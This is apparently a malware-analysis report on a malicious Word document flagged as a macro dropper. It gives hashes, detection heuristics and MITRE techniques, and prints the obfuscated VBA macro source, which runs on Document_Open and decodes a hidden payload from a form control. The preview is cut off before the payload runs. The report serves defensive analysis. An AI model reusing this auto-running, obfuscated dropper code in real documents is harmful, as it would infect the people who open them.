Office (OLE) malware analysis — malicious · 42da997df77d59d9

MALICIOUS

Office (OLE)

213.5 KB Created: 2017-11-15 15:00:00 Authoring application: Microsoft Office Word First seen: 2017-11-20

MD5: a3da35bec93d0d618091224064a3c4d3 SHA-1: c9607bad38933c97d43f268a3ef3fb6e0468e10a SHA-256: 42da997df77d59d9375273e0cb8f5c4d4d39cc4845ec9f6cabc5180fcf3fdf72

122 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV heuristic and the high-severity OLE_VBA_DOCOPEN heuristic indicate that this Office document contains malicious VBA macros. The Document_Open macro is designed to execute automatically when the document is opened, likely to download and execute a second-stage payload. No specific family could be identified due to the obfuscated nature of the script.

Heuristics 4

ClamAV: Doc.Dropper.Agent-6375351-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6375351-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11550 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11550 bytes
SHA-256: `2b826918a3402120c66ad27a4df8ed1f1641c8b64b50eaa96b12eed7c50a51a2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim lion As Long Dim surgical As String quine = nigeria patriotically = "scipio" pity plenipotentiary = 33 + 4 Pmt 0, plenipotentiary, 19513, 47567, 8 End Sub Function briar(courtship) As String Dim benolin As Long Dim dimidiate As Long basal = Math.Round(69) Dim nothings As Long Dim genetics(63) As Long Dim rabbitweed(63) As Long Dim diaphoretic(63) As Long Dim calopogon(6962) As Byte Dim bullpen() As Byte Dim evolution As Long rung = 4 - 35 + 65311 acanthocereus = 50 - 104 + 310 dialectic = 90 - 50 + 215 nonreversible = 49 - 13 + 4060 aflame = 62 - 51 + 262133 dishwashing = 106 - 44 + 16711618 breezily = 128 - 78 + 14 certain = 66 - 98 + 65568 Dim thrall() As Byte thrall = VBA.StrConv(courtship, _ 120 + 8) aussilot = 50 + 54 Pmt 0, aussilot, 25676, 12404, 3 assembled = 7840 + 3 leicestershire = vbKeyShift - 12 For electronics = (4 - 4) To assembled If electronics Mod 2 = (5 - 5) Then thrall(electronics) = thrall(electronics) - leicestershire Else thrall(electronics) = thrall(electronics) - (leicestershire - 1) End If Next electronics caprifig = 29 + 34 Pmt 0, caprifig, 24000, 44641, 4 visite = vitiated For benolin = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) rabbitweed(benolin) = ibuprofen(benolin, breezily, 30 + 10) genetics(benolin) = ibuprofen(benolin, nonreversible, 30 + 10) diaphoretic(benolin) = ibuprofen(benolin, aflame, 20 + 20) Next benolin mantology = 7 + 10 Pmt 0, mantology, 38312, 55005, 8 bullpen = thrall birthwort = 25 + 51 Pmt 0, birthwort, 18300, 28381, 2 malignant = 71 - 64 - 4 chanted = 49 - 22 - 25 For nothings = (4 - 4) To assembled echinoderm = bullpen(nothings) cleanshaven = bullpen(nothings + 2) tripartite = genetics(visite(bullpen(nothings + 1))) barrelfish = rabbitweed(visite(cleanshaven)) + visite(bullpen(nothings + malignant)) evolution = diaphoretic(visite(echinoderm)) + tripartite + barrelfish benolin = ibuprofen(evolution, dishwashing, 32) calopogon(dimidiate) = ibuprofen(benolin, certain, 22) benolin = ibuprofen(evolution, rung, 32) calopogon(dimidiate + 1) = ibuprofen(benolin, acanthocereus, 22) calopogon(dimidiate + chanted) = ibuprofen(evolution, dialectic, 32) dimidiate = dimidiate + chanted + 1 nothings = nothings + 3 Next briar = calopogon End Function Sub pity() general.thyroprotein.Value = Day(#12/5/2013#) varday = sinanthropus = "acquitment" Set cocheleate = general.thyroprotein.SelectedItem heaving = 6 + 52 Pmt 0, heaving, 5849, 19486, 7 bosniaherzegovina = cocheleate.Name addax = 72 - 84 + 7856 compulsory = Right(bosniaherzegovina, addax) cercaria = briar(compulsory) nundinate = 12 + 37 Pmt 0, nundinate, 15618, 38989, 6 #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim coastwise As String Dim attributable As LongPtr Dim stairway As LongPtr Dim piles As Integer #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim multiplexer As Integer Dim stairway As Long Dim unvaried As Variant Dim attributable As Long #End If xraying = 33 + 32 Pmt 0, xraying, 26795, 47436, 5 crossfire = 40 + 1 Pmt 0, crossfire, 8972, 37174, 7 ble = cercaria attributable = armband(ble) coagulable = "alma" inequitably = "catahedra" #If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then Dim butterscotch As String Dim crowberry As LongPtr Dim nonreciprocating As LongPtr Dim phalaropus As LongPtr beard = 1 - 11 + 2074 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim crowberry As Long pollster = 101 - 53 + 733 Dim nonreciprocating As Long Dim phalaropus As Long beard = pollster + 3459 #End If Dim preface As Long Dim asphaltum As String crowberry = 46 - 60 + 14 stairway = attributabl ... (truncated)

SHA-256: 2b826918a3402120c66ad27a4df8ed1f1641c8b64b50eaa96b12eed7c50a51a2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim lion As Long
Dim surgical As String
quine = nigeria
patriotically = "scipio"
pity
plenipotentiary = 33 + 4
 Pmt 0, plenipotentiary, 19513, 47567, 8
End Sub
Function briar(courtship) As String
Dim benolin As Long
Dim dimidiate As Long
basal = Math.Round(69)
Dim nothings As Long
Dim genetics(63) As Long
Dim rabbitweed(63) As Long
Dim diaphoretic(63) As Long
Dim calopogon(6962) As Byte
Dim bullpen() As Byte
Dim evolution As Long
rung = 4 - 35 + 65311
acanthocereus = 50 - 104 + 310
dialectic = 90 - 50 + 215
nonreversible = 49 - 13 + 4060
aflame = 62 - 51 + 262133
dishwashing = 106 - 44 + 16711618
breezily = 128 - 78 + 14
certain = 66 - 98 + 65568
Dim thrall() As Byte
thrall = VBA.StrConv(courtship, _
120 + 8)
aussilot = 50 + 54
 Pmt 0, aussilot, 25676, 12404, 3
assembled = 7840 + 3
leicestershire = vbKeyShift - 12
For electronics = (4 - 4) To assembled
If electronics Mod 2 = (5 - 5) Then
thrall(electronics) = thrall(electronics) - leicestershire
Else
thrall(electronics) = thrall(electronics) - (leicestershire - 1)
End If
Next electronics
caprifig = 29 + 34
 Pmt 0, caprifig, 24000, 44641, 4
visite = vitiated
For benolin = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
rabbitweed(benolin) = ibuprofen(benolin, breezily, 30 + 10)
genetics(benolin) = ibuprofen(benolin, nonreversible, 30 + 10)
diaphoretic(benolin) = ibuprofen(benolin, aflame, 20 + 20)
Next benolin
mantology = 7 + 10
 Pmt 0, mantology, 38312, 55005, 8
bullpen = thrall
birthwort = 25 + 51
 Pmt 0, birthwort, 18300, 28381, 2
malignant = 71 - 64 - 4
chanted = 49 - 22 - 25
For nothings = (4 - 4) To assembled
echinoderm = bullpen(nothings)
cleanshaven = bullpen(nothings + 2)
tripartite = genetics(visite(bullpen(nothings + 1)))
barrelfish = rabbitweed(visite(cleanshaven)) + visite(bullpen(nothings + malignant))
evolution = diaphoretic(visite(echinoderm)) + tripartite + barrelfish
benolin = ibuprofen(evolution, dishwashing, 32)
calopogon(dimidiate) = ibuprofen(benolin, certain, 22)
benolin = ibuprofen(evolution, rung, 32)
calopogon(dimidiate + 1) = ibuprofen(benolin, acanthocereus, 22)
calopogon(dimidiate + chanted) = ibuprofen(evolution, dialectic, 32)
dimidiate = dimidiate + chanted + 1
nothings = nothings + 3
Next
briar = calopogon
End Function

Sub pity()
general.thyroprotein.Value = Day(#12/5/2013#)
varday = sinanthropus = "acquitment"
Set cocheleate = general.thyroprotein.SelectedItem
heaving = 6 + 52
 Pmt 0, heaving, 5849, 19486, 7

bosniaherzegovina = cocheleate.Name
addax = 72 - 84 + 7856
compulsory = Right(bosniaherzegovina, addax)
cercaria = briar(compulsory)
nundinate = 12 + 37
 Pmt 0, nundinate, 15618, 38989, 6

#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim coastwise As String
Dim attributable As LongPtr
Dim stairway As LongPtr
Dim piles As Integer
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim multiplexer As Integer
Dim stairway As Long
Dim unvaried As Variant
Dim attributable As Long
#End If
xraying = 33 + 32
 Pmt 0, xraying, 26795, 47436, 5
crossfire = 40 + 1
 Pmt 0, crossfire, 8972, 37174, 7
ble = cercaria
attributable = armband(ble)
coagulable = "alma"
inequitably = "catahedra"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim butterscotch As String
Dim crowberry As LongPtr
Dim nonreciprocating As LongPtr
Dim phalaropus As LongPtr
beard = 1 - 11 + 2074
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim crowberry As Long
pollster = 101 - 53 + 733
Dim nonreciprocating As Long
Dim phalaropus As Long
beard = pollster + 3459
#End If
Dim preface As Long
Dim asphaltum As String
crowberry = 46 - 60 + 14
stairway = attributabl
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.